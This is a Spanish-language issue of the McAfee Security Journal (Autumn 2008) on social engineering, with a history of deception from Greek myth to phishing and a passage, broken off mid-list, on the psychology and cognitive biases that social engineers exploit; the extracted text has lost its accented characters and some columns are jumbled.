Perspectiva sobre seguridad de McAfee Avert Labs Otoo de 2008

IngenIera socIal la principal amenaza de seguridad del mundo

Troyanos, falsos clic y anuncios de dinero fcil son algunos de los vectores utilizados por los creadores de malware para aprovecharse de los usuarios de Internet

McAfee Security Journal otoo 2008

ndice

Redactor jefe Dan sommer Colaboradores anthony Bettini Hiep Dang Benjamin edelman elodie grandjean Jeff green aditya Kapoor rahul Kashyap Markus Jacobsson Karthik raman craig schmugar Estadsticas Toralv Dirro shane Keats David Marcus Franois Paget craig schmugar Ilustrador Doug ross Diseo PaIr Design, llc Agradecimientos Muchas personas han contribuido a la creacin de este nmero de McAfee Security Journal. citaremos nicamente algunos de los colaboradores ms destacados: los directivos de Mcafee, Inc. y Mcafee avert labs que han prestado su apoyo a esta creacin; nuestro equipo de revisorescarl Banzhof, Hiep Dang, David Marcus, craig schmugar, anna stepanov y Joe Telafici; nuestros autores y sus jefes y compaeros que les han aportado sus ideas y comentarios; los especialistas en marketing cari Jaquet, Mary Karlton, Beth Martinez y Jennifer natwick; el especialista en relaciones pblicas Joris evers, su equipo internacional y red consultancy ltd.; nuestra agencia de diseo, Pair Design; nuestra imprenta, rr Donnelley, y Derrick Healy y su equipo en nuestra oficina de localizacin de cork, Irlanda, que ha coordinado la traduccin de esta publicacin a muchos idiomas. gracias a todos; esta publicacin no sera una realidad sin vuestra inestimable contribucin! Dan sommer redactor jefe

4

Los orgenes de la ingeniera social Desde el caballo de Troya de la odisea hasta el phishing en Internet: el eterno engao. Hiep Dang Pedid y se os dar la psicologa de la ingeniera social: Por qu funciona? Karthik Raman Ingeniera social 2.0: Y ahora qu? el fraude del clic se vislumbra como una de las amenazas ms importantes que deberemos afrontar en el futuro cercano. Markus Jakobsson Los Juegos Olmpicos de Pekn: Un objetivo perfecto para el malware de ingeniera social los Juegos olmpicos, junto con otros grandes eventos, constituyen una atraccin irresistible para los creadores de malware. Elodie Grandjean Vulnerabilidades en los mercados de valores Pueden los piratas informticos obtener ganancias del Martes de parches y otras noticias de las empresas? Anthony Bettini El futuro de los sitios de redes sociales la afluencia de usuarios y dinero convierte a los sitios sociales en un objetivo ms del malware. Craig Schmugar La nueva cara de las vulnerabilidades Trucos de ingeniera social pueden empujar a los usuarios a agujeros de software. Rahul Kashyap Typosquatting: Aventuras involuntarias de navegantes el navegante imprudente puede acabar en el lugar equivocado. Benjamin Edelman Qu ha sido del adware y el spyware? Una legislacin ms severa puede haber apaciguado el adware, pero los programas potencialmente no deseados (PUP) y troyanos siguen entre nosotros. Aditya Kapoor Estadsticas cul es el riesgo para los dominios de primer nivel? David Marcus

9 13

16

22

28

31 34

38

44

le ha gustado? no le ha gustado? enve sus comentarios a security_Journal@mcafee.com.

el debut de "Mcafee security Journal"Jeff Green

Bienvenido al primer nmero de nuestra revista de seguridad McAfee Security Journal. aunque lo llamamos "primer nmero", en realidad no es la primera vez que realizamos esta publicacin. le hemos cambiado el nombre; hasta ahora era Anlisis de amenazas globales (gTr). en McAfee Security Journal, observar la actitud crtica de siempre, junto a todo el contenido dinmico que puede esperar de los mejores investigadores y autores en el campo de la investigacin de la seguridad informtica: los especialistas de Mcafee avert labs. en este nmero, abordamos el vector de ataque ms insidioso e invasivo de todos: la ingeniera social. Tibet libre! Nuevas imgenes de la III Guerra Mundial! Secretos para evadir impuestos! Nuevas tecnologas para ahorrar electricidad! Medicinas a buen precio a travs de Internet! y la lista podra seguir, pero creo que ha quedado claro. ahora ms que nunca el envo de mensajes seductores que lleguen a las vctimas potenciales es clave para el xito de los desarrolladores de malware y los ladrones de identidad. sin embargo, el uso de la ingeniera social como mtodo de estafa no es precisamente nuevo: existe desde que los humanos se comunican. T tienes algo que yo quiero. Te convenzo para que me lo des o para que hagas lo que yo quiero. el factor humano hace de la ingeniera social una de las amenazas ms difciles de combatir. es posible que la forma ms fcil de apoderarse de la identidad de otra persona sea simplemente pedrsela. Todas las tcnicas de ingeniera social estafas Ponzi, timos, estafas piramidales, fraudes sencillos, phishing o spam siguen patrones similares. ya sean fsicas o digitales, todas tienen elementos en comn. comparten el mismo objetivo y en muchos casos incluso emplean las mismas tcnicas. Todas pretenden manipular a las vctimas aprovechando un fallo en el hardware humano. Todas crean escenarios especialmente diseados para convencer a las vctimas de que divulguen determinada informacin o realicen una accin concreta. Hemos reunido a otro destacable grupo de investigadores y autores para analizar este tema y documentarlo para nuestros lectores. Incluso hemos incorporado una novedad a nuestra revista: ser la primera vez que contamos con colaboradores invitados. empezamos con dos de los mejores: el Dr. Markus Jacobsson del centro de investigacin Palo alto research center y el profesor Benjamin edelman de la universidad de estudios empresariales Harvard Business school.

empezaremos con una mirada retrospectiva a la historia del engao. a continuacin, analizaremos el trasfondo psicolgico de este tipo de ataques. Despus examinaremos la posible evolucin de la ingeniera social en los prximos aos. los Juegos olmpicos de Pekn de 2008 han terminado, y una vez ms los autores de malware han intentado engaar a los aficionados para que visitaran sitios Web falsos. se puede ganar dinero en la bolsa programando eventos como los Martes de parches de Microsoft o falsificando noticias de empresas? en nuestra exhaustiva investigacin hallarn una respuesta. y qu ocurrir a partir de ahora con los sitios de redes sociales? se reforzar la seguridad o estn condenados a convertirse en objetivos fciles debido a un exceso de confianza de los usuarios? Vamos a ver tambin cmo atacan los creadores de malware algunas vulnerabilidades del software y cmo aprovechan los errores cometidos al escribir el nombre de los sitios Web, tcnica conocida como typosquatting. nuestro artculo final dar una respuesta a la pregunta Qu ha pasado con el adware y el spyware? Terminaremos con algunos datos estadsticos que muestran cmo vara el porcentaje de amenazas dirigidas a dominios de nivel superior en todo el mundo. esperamos que encuentre este nmero tan interesante e inquietante como nosotros. gracias por acompaarnos de nuevo en nuestro viaje a las profundidades de la seguridad informtica.

Jeff Green es Vicepresidente primero de Mcafee avert labs y del departamento de Desarrollo de productos. es responsable a nivel mundial de toda la organizacin de investigacin de Mcafee, que se extiende por los continentes americano, europeo y asitico. su tarea es supervisar los equipos de investigacin que se ocupan de los virus, ataques dirigidos y ataques de piratas, spyware, spam, phishing, vulnerabilidades y parches, as como de las tecnologas de deteccin/prevencin de intrusiones en hosts y redes. adems, green lidera la investigacin sobre seguridad a largo plazo con el fin de garantizar que Mcafee vaya siempre un paso por delante de las amenazas emergentes.

oToo 2008

3

los orgenes de la ingeniera socialHiep Dang

sera difcil hoy en da leer un artculo de prensa o un libro sobre seguridad informtica sin que apareciera el trmino ingeniera social ms de una vez.Popularizada por Kevin Mitnick (posiblemente el ingeniero social ms tristemente famoso de la era informtica moderna), la ingeniera social es en esencia el arte de la persuasin: convencer a las personas para que revelen datos confidenciales o realicen alguna accin. aunque el trmino ingeniera social es relativamente nuevo, las tcnicas y filosofas que la sustentan estn presentes desde los albores de la humanidad. existen historias de engao y manipulacin en muchas pginas de la historia, el folclore, la mitologa, la religin y la literatura. ms de ingeniera social contra Zeus, Prometeo rob el brillo que se ve de lejos del infatigable fuego en una hueca caaheja del monte olimpos y se lo leg a los hombres. como castigo por sus actos, Prometeo fue encadenado a una roca, a la que cada da llegaba un guila que le coma el hgado; por la noche ste le volva a crecer. como castigo para los hombres, Zeus cre a la primera mujer, Pandora, quien portaba un nfora que ella abri por curiosidad, liberando incontables plagas.

el ataque de phishing de Jacob y rebeca Prometeo: el Dios de la ingeniera social?segn la mitologa griega, el nivel de competencia actual del ser humano en la ingeniera social es probablemente resultado directo de su mayor mentor: Prometeo, cuyas habilidades le llevaron a creer que poda engaar a Zeus, el mayor de los dioses. en la Teogona y Trabajos y das, el poeta pico Hesodo narra la historia de Prometeo, un Titn conocido por sus maas y sus astutos ardides. se le atribuye la creacin del hombre, modelado a partir de barro. en lo que se conoce como el "engao de Mecona", Prometeo present a Zeus dos ofrendas para dirimir una disputa entre dioses y mortales. Una ofrenda era la carne de un buey metida en el interior de su estmago, la otra era el esqueleto del buey cubierto con brillante grasa. la una era alimento envuelto en cobertura vil mientras la otra era ofrenda incomestible, aunque muy tentadora a la vista. Zeus eligi la ltima y, como consecuencia, en lo sucesivo la humanidad debera sacrificar a los dioses slo huesos y grasa, conservando la carne para s. enojado por el engao de Prometeo, Zeus castig a los mortales quitndoles el fuego. sin embargo, en un acto Del antiguo Testamento proviene la historia de Jacob y su madre rebeca, quien utiliz una tcnica de ingeniera social que es la base de los actuales ataques de phishing: hacer creer a la vctima que el atacante es alguien diferente. el padre de Jacob y esposo de rebeca, Isaac, se qued ciego en los ltimos aos de su vida. Mientras se preparaba para morir, orden a su hijo mayor, esa: treme caza y preprame un buen guisado como a m me gusta y tremelo para que yo coma y que mi alma te bendiga antes que yo muera. (gnesis 27:2-4.) como quera que fuera Jacob en lugar de esa el que recibiera las bendiciones de Isaac, rebeca concibi un plan. Jacob, reacio al principio, dijo: "esa mi hermano es hombre velludo y yo soy lampio. Quiz mi padre me toque, y entonces ser para l un engaador y traer sobre m una maldicin y no una bendicin. (gnesis 27:11-12.) Para engaar a Isaac y hacerle creer que estaba con esa, rebeca prepar la comida de Isaac, visti a Jacob con las mejoras ropas de esa y le puso piel de cabrito en las partes lampias de las manos y el cuello. Jacob le entreg la comida a Isaac, super la prueba de autenticacin y consigui las bendiciones que deban ser para esa.

4

McaFee secUrITy JoUrnal

sansn y Dalila: espionaje a sueldosansn fue un personaje bblico de enorme fuerza que pele contra los filisteos. el secreto de su fuerza estaba en su largo cabello. estando en gaza, sansn se enamor de Dalila. los filisteos la convencieron para que averiguara el secreto de la fuerza de sansn a cambio de 1.100 monedas de plata. Persudelo, y ve dnde est su gran fuerza, y cmo podramos dominarlo para atarlo y castigarlo. entonces cada uno de nosotros te dar 1.100 monedas de plata. (Jueces 16:5.) sansn se resisti a desvelar su secreto antes de sucumbir a su capacidad de persuasin. as que ella le dijo: cmo puedes decir: 'Te quiero,' cuando tu corazn no est conmigo? Me has engaado tres veces y no me has declarado dnde reside tu gran fuerza. Finalmente, tras insistir y acosarlo da y noche, se rindi. De modo que le dijo: nunca ha pasado navaja sobre mi cabeza, pues he sido nazareo para Dios desde el vientre de mi madre. si me cortan el cabello, mi fuerza me dejar y me debilitar y ser como cualquier otro hombre. (Jueces 16:1517.) en cuanto sansn se durmi, Dalila se aprovech de su vulnerabilidad y le cort el pelo. Debilitado como qued, los filisteos prendieron a sansn, le sacaron los ojos, lo encadenaron y encarcelaron para siempre.

Oh miserables ciudadanos! Qu locura tan grande! Qu increble locura es sta? Pensis que se han alejado los Griegos de vuestras costas? As conocemos a Ulises? O en esa armazn de madera, hay gente aqui va oculta, o se ha fabricado en dao de nuestros muros, con objeto de explorar nuestras moradas y dominar desde su altura la ciudad, o algn otro engao esconde. No confiis en sus regalos, no creis en el caballo!la falta de juicio de los troyanos fue su perdicin. esa noche, dirigidos por Ulises, los soldados griegos ocultos en el interior del caballo mataron a los guardias y abrieron las puertas al resto del ejrcito. gracias a la ingeniosa tctica de ingeniera social ideada por Ulises, los griegos derrotaron a los troyanos.

el primer caballo de Troyala historia del caballo de Troya, famosa gracias a la obra pica del poeta griego Homero, la Odisea, y a la del poeta romano Virgilio, la Eneida, fue uno de los engaos de ingeniera social ms inteligentes de la historia de la humanidad. Durante la guerra de Troya, los griegos no pudieron derribar las murallas que circundaban la ciudad. el astuto guerrero griego Ulises concibi una estratagema para inducir a los troyanos a creer que los griegos haban abandonado el asedio de la ciudad. los griegos alejaron su flota de barcos y solo dejaron en la playa un gran caballo de madera junto con un soldado griego llamado sinn. Tras ser capturado por los troyanos, sinn les dijo que los griegos haban dejado el enorme caballo de madera como ofrenda a los dioses para garantizar su seguridad en el viaje de vuelta a casa y que lo haban hecho tan grande para que los troyanos no lo pudieran desplazar al interior de la ciudad, ya que ello les traera mala suerte a los griegos. el relato fue tan tentador que los troyanos introdujeron el caballo de madera tras las murallas de la ciudad, a pesar de los avisos de casandra, que fue maldita con la habilidad de predecir el futuro sin que nadie la creyera jams, y de laocoonte, un sacerdote troyano, quien en la Eneida exclam:

el caballo de Troya actualcuando Ulises traz su plan para infiltrarse en Troya, poco imaginaba l que estaba sentando un precedente para los siglos venideros. el tipo de malware ms frecuente que se encuentra en la actualidad, el trmino "caballo de Troya" electrnico lo acu Daniel edwards de la agencia de seguridad nacional de estados Unidos en los aos setenta. edwards le puso ese nombre por la tcnica de ingeniera social utilizada por los griegos. antes de Internet, los usuarios de Pc que queran compartir archivos de software lo hacan mediante dispositivos fsicos (como discos flexibles o unidades de cinta) o conectndose a los sistemas de tabln de anuncios (BBs). los piratas informticos con fines malintencionados se dieron cuenta enseguida de que podan inducir a los usuarios a ejecutar un cdigo malintencionado sencillamente disfrazndolo como un juego o una utilidad. Debido a la simplicidad y efectividad de los troyanos, los creadores de malware todava emplean esta tcnica de ingeniera social siglos despus. en la actualidad, el nmero de usuarios de Pc que se dejan infectar con troyanos es alarmante. les atrae la tentacin de la msica, los vdeos, el software gratuitos y los simpticos mensajes electrnicos de annimos seres queridos.

oToo 2008

5

Crecimiento del malware y los programas PUP Distintas familias desde el ao 1997 al 2007 en miles

140 130 120 110 100 90 80 70 60 50 40 30 20 10 0 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007Figura 1: La frecuencia de malware y programas potencialmente no deseados (PUP) en los archivos de firmas de McAfee ha tenido varios momentos lgidos en la ltima dcada. En 1998 entraron en escena los generadores de virus; en 2003 y 2004 se popularizaron los remitentes de correo masivo; en 2004 y 2005 aumentaron las redes de bots y en 2006 y 2007 despegaron los troyanos.

Virus y bots Troyanos PUP

Un timo actualizadoel fraude del pago por adelantado, ms conocido como timo nigeriano (timo 419), ha circulado durante dcadas y sigue siendo uno de los tipos de spam ms prolficos. el nmero 419 hace referencia a la seccin del cdigo Penal de nigeria que prohbe esta prctica. esta tctica de ingeniera social de enriquecimiento rpido lleg en forma de carta y empez a distribuirse por correo postal en los setenta. el timo evolucion hacia faxes no solicitados en los ochenta y, en la actualidad, se enva casi exclusivamente a travs del correo electrnico. sus orgenes se remontan al siglo diecisis, cuando se conoca como el timo del prisionero espaol. el plan es bien sencillo: se informa a una vctima ingenua sobre un prisionero espaol enormemente rico que necesita ayuda para ser liberado. este por as llamarlo prisionero contaba con que el estafador recaudara la cantidad necesaria para el rescate. el estafador abordaba a la vctima contndole la historia y permita que l o ella le ayudaran con una parte de la recaudacin de fondos, bajo la promesa de enormes ganancias. Hoy conocemos numerosas variantes de la carta, pero el concepto es el mismo. el timo nigeriano atrae a sus vctimas con la tentadora promesa de un pago multimillonario a cambio de una inversin de slo unos pocos miles de dlares. aunque la mayora de los receptores comprenden que la oferta es demasiado buena para ser cierta, aproximadamente un 1% de los destinatarios acaba respondiendo. segn los servicios secretos de ee. UU., los timadores estafaron a sus vctimas una media de 100 millones de dlares anuales.

6

McaFee secUrITy JoUrnal

Informes sobre casos de phishing En miles

60 50 40 30 20 10 0Nov de 2003 Mayo de 2004 Nov de 2004 Mayo de 2005 Nov de 2005 Mayo de 2006 Nov de 2006 Mayo de 2007 Nov de 2007Figura 2: Los informes sobre phishing muestran un crecimiento sostenido y el nmero de nuevos sitios de phishing se ha incrementado espectacularmente en los dos ltimos aos. (Fuente: AntiPhishing Working Group)

Informes de nuevos casos de phishing Nuevos sitios de phishing

Phishingel trmino phishing fue acuado por los piratas informticos. Proviene de fishing (pesca) porque esta tcnica de ingeniera social engaa a sus vctimas para que desvelen sus nombres de usuario, contraseas, nmeros de tarjeta de crdito y otros datos personales. en los aos noventa, muchos piratas informticos se aprovecharon de las ofertas de prueba gratuita del servicio de Internet de america online (aol) utilizando nmeros falsos de tarjetas de crdito generados automticamente, que no se correspondan con cuentas reales. Despus de que aol mejorase su seguridad y las pruebas de validacin de tarjetas de crdito para garantizar que los nmeros de dichas tarjetas fueran legtimos, los malhechores se lanzaron a la bsqueda de nombres de usuario y contraseas reales para introducirse en las redes de aol. empezaron enviando correos electrnicos y mensajes instantneos falsos que parecan proceder del servicio tcnico de aol. Muchas vctimas desprevenidas facilitaron sus datos y a continuacin se les facturaron actividades y compras que los piratas informticos realizaron en sus cuentas. los cibercriminales enseguida se dieron cuenta del margen potencial de beneficios y la tasa de xito de tales ataques y dirigieron sus miradas a las empresas (bancos, eBay, amazon y otras) que realizaban transacciones comerciales electrnicas.

oToo 2008

7

Historia de la seguridad informticaComienzan a aparecer caballos de Troya en sistemas BBS. Se crea ARPANET (precursor de Internet). Se publica en ARPANET Creeper (el primer virus informtico). John von Neumann publica su teora del autmata autorreproductor. Se crea INTERNET a partir de ARPANET. Hace aparicin el spam (correo electrnico no solicitado), poco despus de que el pblico tuviera acceso a Internet. Dr. El Dr. Frederick Cohen publica Virus Informticos: teora y experimentos y reconoce a Leonard Adleman acuando el trmino virus informtico. McAfee Avert Labs se convierte en el primer equipo de respuesta de emergencia antivirus internacional de la industria. Se concibe el primer ataque de phishing para robar contraseas de usuarios de AOL. En la actualidad, McAfee Avert Labs protege a sus clientes contra virus, gusanos, troyanos, spyware, programas PUP; vulnerabilidades, spam, phishing, dominios malignos, intrusiones de red e intrusiones en host.

1948

1965

1969

1971

1978 1980 1982 1983 1984 1986 1988

1995 1996

2000 2002

2008

Aparece Elk Cloner (el primer virus para Apple). Se crea el correo electrnico. Se crea el primer sistema de tabln de anuncios (BBS) pblico. John Draper (alias Capn Crunch) descubre que un silbato de juguete que vena en una caja de cereales permite utilizar la red telefnica de forma ilegal.

Aparece el gusano Morris (el primer virus que se autorreplica). Aparece Brain (el primer virus para PC). Kevin Mitnick publica The Art of Deception (El arte del engao), en el que describe su dominio de la ingeniera social. Spyware y adware se convierten en trminos de uso comn.

La pelcula Juegos de guerra dramatiza sobre las consecuencias de la piratera.

Figura 3: Cronologa de los principales eventos de ingeniera social.

la historia se repiteya se llame ingeniera social, artimaas, estafas, sesgos cognitivos o timos, el concepto de aprovecharse de la ingenuidad y la confianza de una persona es tan frecuente en la actualidad como lo ha sido desde los albores del tiempo. si se pregunta a expertos en seguridad, convendrn que las personas somos el eslabn ms dbil de la cadena de seguridad. Podemos desarrollar el software ms seguro que exista para proteger nuestros equipos, implantar las directivas de seguridad ms restrictivas e intentar lograr la utpica educacin del usuario. sin embargo, mientras sigamos dejndonos arrastrar por la curiosidad y la codicia sin preocuparnos de las consecuencias, correremos el riesgo de sufrir nuestra propia versin de una tragedia troyana. El progreso no consiste en cambio, sino que depende de la capacidad de retentiva. Cuando el cambio es absoluto, no quedan restos que mejorar ni direccin que definir para la posible mejora: y cuando la experiencia no se retiene, como ocurre entre salvajes, la infancia es perpetua. Aquellos que no recuerdan el pasado, estn condenados a repetirlo.George Santayana, en La razn en el sentido comn, de La vida de la razn o fases del progreso humano.BIBLIOGRAfA anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. (estudio Mitnick, K. (2002). The Art of Deception. (el arte del engao) Indianapolis, Indiana:

Hiep Dang es director del departamento de Mcafee avert labs encargado de la investigacin de las aplicaciones de malware. es el responsable de la coordinacin del equipo mundial de investigadores de malware de Mcafee dedicado a la investigacin, anlisis y respuesta a los brotes de malware, incluyendo virus, gusanos, troyanos, bots y spyware. Dang escribe regularmente en los blogs y libros blancos de avert labs y en la publicacin McAfee Security Journal. Ha sido entrevistado por el Wall Street Journal, MsnBc, PC Magazine y otras muchas publicaciones y medios sobre las nuevas amenazas y las tendencias del malware. adems, Dang prctica con entusiasmo el Kung Fu de la Mantis religiosa del norte Wah lum Tam Tui y el Tai chi. en la actualidad se encuentra en un parntesis de su vida como formador concentrndose en la industria de la seguridad informtica.

sobre planificacin de tecnologa para la seguridad informtica) U.s. air Force. Farquhar, M. (2005). A Treasury of Deception. (Un tesoro de mentira) new york: The Penguin group. Hesodo (1914) Teogona. (Traduccin de a. Prez Jimnez) Hesodo (1914) Trabajos y das. (Traduccin de a. Prez Jimnez) Homero. La Ilada. (Traduccin de e. crespo)

Wiley Publishing. Myers, M. J. (2007). Phishing and Countermeasures. (el phishing y las medidas

para combatirlo) John Wiley & sons, Inc. santayana, g. (1905). La vida de la razn o fases del progreso humano, editorial Tecnos Virgilio (1993). La Eneida. (Traduccin de J. de echave sustaeta)

8

McaFee secUrITy JoUrnal

Pedid y se os darKarthik Raman

en enero de 2007, un grupo de ciberdelincuentes recurri a tcticas de ingeniera social para cometer el fraude online ms importante del mundo del que se tienen datos: el robo de 877.000 euros de clientes del banco sueco nordea Bank.los clientes recibieron un correo electrnico supuestamente procedente del nordea Bank, y 250 descargaron e instalaron el software antispam tal como se les peda en el mensaje. en realidad, el software antispam era un troyano que recababa informacin de los clientes y que los delincuentes utilizaban para conectarse al sitio Web del banco y robar dinero1. segn un principio de seguridad universal, las personas son el punto dbil de todo sistema de seguridad. si bien los ataques contra la seguridad y las medidas de proteccin desarrolladas para responder a dichos ataques siguen evolucionando, la naturaleza humana permanece inalterable. Para un agresor informtico, la ingeniera social es ms eficaz y ofrece resultados ms rpidos que efectuar un ataque de fuerza bruta en algoritmos de cifrado, realizar pruebas con datos aleatorios para detectar nuevas vulnerabilidades de software o aumentar la complejidad del malware. Para los autores del fraude del nordea Bank era ms sencillo pedir a los clientes del banco que instalaran un troyano que entrar en una cmara acorazada para robar dinero. somos crdulos, codiciosos y curiosos, lo que significa que los ingenieros sociales pueden manipular nuestros sentimientos y pensamientos. nos piden algo y muy a menudo se lo damos. Pero, por qu nos comportamos de este modo? en un estudio pionero sobre la psicologa de la seguridad, el prestigioso experto en seguridad Bruce schneier identific cuatro reas de investigacineconoma del comportamiento, psicologa de la toma de decisiones, psicologa del riesgo y neurocienciaque pueden ayudar a explicar por qu nuestra sensacin de seguridad difiere de la realidad2. esta edicin de Mcafee security Journal y este artculo en concreto se centran en un aspecto de la seguridad: la ingeniera social. en este anlisis, recurriremos a la neurociencia, la psicologa de la toma de decisiones y la psicologa social bsica para analizar por qu nos dejamos embaucar por la ingeniera social sin percatarnos del engao.

Dos cerebrosel cerebro humano es posiblemente el sistema ms complejo del universo. Parte de su complejidad radica en su complicada estructura e intrincada interaccin de subsistemas. en el cerebro, las emociones parecen emerger de las partes internas ms antiguas, como la amgdala, y el razonamiento de las partes externas ms recientes, como el neocrtex3. Pero los centros de la emocin y la razn no son mutuamente excluyentes, como observ Isaac asimov en su libro El cerebro humano4: Segn parece, las emociones no surgen de una pequea parte del cerebro en particular, sino que muchas partes, incluidos los lbulos frontal y temporal del crtex, participan en una interaccin compleja. las partes del cerebro responsables de la emocin y la razn a veces pueden actuar en convergencia o en divergencia. ese es el motivo por el que nos resulta difcil mantener separadas razn y emocin, y por el que le resulta fcil a la emocin imponerse a la razn cuando ambas se contradicen. examinemos cmo nos enfrentamos al miedo, por ejemplo. al analizar cmo reaccionamos ante un peligro inminente, el escritor cientfico steven Johnson seala que la respuesta al miedo es una combinacin orquestal de instrumentos psicolgicos que se suceden con una velocidad y precisin magistrales5: Es lo que en lenguaje llano denominamos respuesta de lucha o huida. Sentir como se activa es uno de los mejores modos de percibir el cerebro y el cuerpo como un sistema autnomo que funciona independientemente de la voluntad consciente. cuando volvemos a experimentar las condiciones que desencadenaron una respuesta de lucha o huida en el pasado, nos rendimos a la respuesta emocional aunque podamos pensar de forma objetiva que la respuesta no est fundamentada.

oToo 2008

9

Polticos deshonestos, espas y estafadores saben que apelar a las emociones especialmente al miedo para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. los ingenieros sociales mantienen viva esta tradicin.

Teoras de la ingeniera socialManipulacin de las emocionesMuchos ingenieros sociales se centran en las emociones de miedo, curiosidad, codicia y compasin. es un hecho arraigado que estas emociones son universales; en algn momento, todos sentimos miedo o curiosidad o nos dejamos llevar por la codicia o la compasin. el miedo y la curiosidad son tiles en muchas situaciones. escapar de un edificio en llamas es algo positivo. la curiosidad puede ayudar a motivarnos y aprender algo nuevo. an as, actuar movidos por el miedo o la curiosidad puede empujarnos a hacer cosas peligrosas o no deseadas6. algunos ataques pueden perpetrarse incluso sin que el ingeniero social est presente, manipulando la curiosidad de una vctima. en abril de 2007, se dejaron en un aparcamiento de londres varias unidades UsB infectadas con un troyano bancario. los que no pudieron resistir la tentacin de saber qu contenan esas unidades, probablemente contentos por hacerse con un dispositivo de almacenamiento gratis, conectaron las unidades a sus equipos y los infectaron de malware7. los delincuentes que amenazan o chantajean a sus vctimas manipulan su miedo. el troyano gPcoder.i, que hizo su aparicin en junio de 2008, es un ejemplo de malware que manipulaba el miedo: cifraba los archivos de los usuarios y exiga un rescate a cambio de descifrarlos8. De igual forma, los delincuentes que sobornan a sus vctimas manipulan su codicia y los que fingen necesitar ayuda, su compasin.

Polticos deshonestos, espas y estafadores saben que apelar a las emociones especialmente al miedo para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. Los ingenieros sociales mantienen viva esta tradicin.

clasificar las cosas en funcin de algunas caractersticas clave y luego responder de forma mecnica cuando alguna de estas caractersticas de activacin se manifiesta. analicemos cmo los ingenieros sociales pueden provocar en nosotros respuestas automticas que les beneficien.

Activacin de sesgos cognitivosUn sesgo cognitivo es un error mental causado por una estrategia de procesamiento de la informacin simplificada10. cuando una heurstica falla, se convierte en un sesgo. los ingenieros sociales transforman nuestra heurstica en errores graves y sistemticos11. a continuacin se describen algunos sesgos cognitivos que pueden explicar la ingeniera social:

Sesgo de la eleccin comprensiva recordamos una eleccin que hemos hecho en el pasado con ms aspectos positivos que negativos12. Un internauta podra habituarse a comprar artculos con descuento en Internet a partir de recomendaciones de amigos. Un simple mensaje de spam podra parecer una recomendacin ms y llevar al comprador a proporcionar los datos de su tarjeta de crdito a un sitio Web fraudulento. Sesgo de confirmacin recabamos e interpretamos la informacin de modo que confirme nuestros puntos de vista13. Veamos un ejemplo hipottico. supongamos que acme corporation firma un contrato con Best Printers para el mantenimiento de sus impresoras y que el personal de servicio de Best Printers viste camisa gris de manga larga con placa de identificacin. con el tiempo, los empleados de acme se acostumbrarn a ver al personal de servicio de Best Printers con sus uniformes e identificarn a cualquier persona con una camisa gris de manga larga y una placa de identificacin como un tcnico. Un ingeniero social podra confeccionar o robar un uniforme de Best Printers para hacerse pasar por personal de servicio, y no ser conminado a identificarse debido al sesgo de confirmacin de los empleados de acme. Efecto de exposicin nos gustan las cosas (y otras personas) segn lo familiarizados que estemos con ellas14. las noticias sobre desastres naturales y provocados por el hombre a menudo dan pie a sitios Web de phishing que se aprovechan

Atajos mentales errneosen ocasiones, los ingenieros sociales apelan a un elemento externo a nuestras emociones. Intentan alterar nuestras reglas mentales de procesamiento de la informacin, conocidas como heurstica o reglas generales. si bien hay que admitir que nuestra heurstica es falible, tambin hay que decir que no podemos funcionar sin ella. nuestras vidas seran demasiado complicadas si tuviramos que analizar detenidamente todo lo que percibimos, decimos o hacemos. necesitamos desesperadamente nuestros atajos mentales. el psiclogo robert cialdini explica esta necesidad9: No se puede pretender que reconozcamos y analicemos todos los aspectos de cada persona, circunstancia y situacin con las que nos encontramos incluso en un solo da. No disponemos de tiempo, energa ni capacidad para ello. Debemos recurrir muy a menudo a nuestros estereotipos, nuestras reglas generales, para

10

McaFee secUrITy JoUrnal

de ese sentimiento15. las personas expuestas a estas noticias podran ser fcilmente manipuladas para que visiten sitios Web de phishing que afirman guardar algn tipo de relacin con estas noticias. Por ltimo, su exposicin a las noticias podra hacerles bajar la guardia en relacin con la naturaleza maliciosa del sitio Web que estn visitando.

Anclaje las personas nos centramos en un rasgo de identificacin inicialmente manifiesto cuando tomamos decisiones sobre algo16. Un sitio Web falso de un banco que muestre ostensiblemente el logotipo especfico de la entidad puede engaar a los usuarios, aunque haya otros indicadores de seguridad que les alerten del engao17.

los medios de tergiversar el efecto de saliencia en su favor. se pueden hacer pasar por un cliente trajeado o por un guardia uniformado, pero nunca por un malabarista con zancos. la confusin no se limita exclusivamente a la vestimenta y al aspecto: tambin puede implicar conocer la jerga, ancdotas o empleados de una empresa, e incluso imitar acentos regionales. Un ingeniero social de Madrid que pretenda infiltrarse en una empresa de sevilla, puede saber que ana ha vuelto a ser madre o que Julio va a dejar la empresa para irse a la competencia, e intercambiar unas palabras al respecto con la recepcionista utilizando acento de sevilla con tal de conseguir acceso a las instalaciones como tcnico de mantenimiento. Conformidad, cumplimiento y obediencia respondemos a las presiones de conformidad, cumplimiento y obediencia alterando nuestro comportamiento. Muchos ataques de ingeniera social pueden explicarse a partir de las respuestas predecibles de las vctimas a estas presiones. Una ingeniera social podra hacerse pasar por una ejecutiva de visita y persuadir a un joven guardia de seguridad para que la dejara entrar en las instalaciones pese a no llevar placa de identificacin. (la promesa de la agresora en forma de recompensa o amenaza de castigo puede suponer otro elemento de presin para el guardia.) el guardia podra sentirse abrumado y obedecer. no se han registrado ataques de ingeniera social en grupo, pero son perfectamente viables. Varios ingenieros sociales podran hacerse pasar por empleados legtimos e incomodar a una recepcionista hasta conseguir que les dejara entrar en la oficina espetando frases como no nos haga perder el tiempo o Djenos hacer nuestro trabajo. la recepcionista simplemente podra dejarles pasar para no ganarse la antipata de los dems. otra tcnica distinta que se sabe que utilizan los espas es relacionarse durante un tiempo con la vctima. el agresor solicita en un primer momento informacin "inocente" a la vctima y posteriormente intenta sonsacarle informacin confidencial. la vctima se siente atrapada; presionada para satisfacer la siguiente solicitud, dado su historial de condescendencia, o se arriesga a sufrir algn tipo de chantaje.

Provocacin de errores en esquemaslos psiclogos sociales definen un esquema como la imagen de la realidad que utilizamos como referencia para poder extraer conclusiones sobre nuestro entorno. De nios, aprendemos que tratar bien a los dems es algo bueno. el reputado ingeniero social Kevin Mitnick seala que los agresores lo saben y elaboran una peticin para sus vctimas que parezca tan razonable que no levante sospechas, al tiempo que se valen de su confianza18. Por lo tanto, los ingenieros sociales se aprovechan del diseo de nuestro esquema social. a continuacin se incluye una lista de valoraciones o errores sociales comunes, con ejemplos de cmo los ingenieros sociales se aprovechan de ellos:

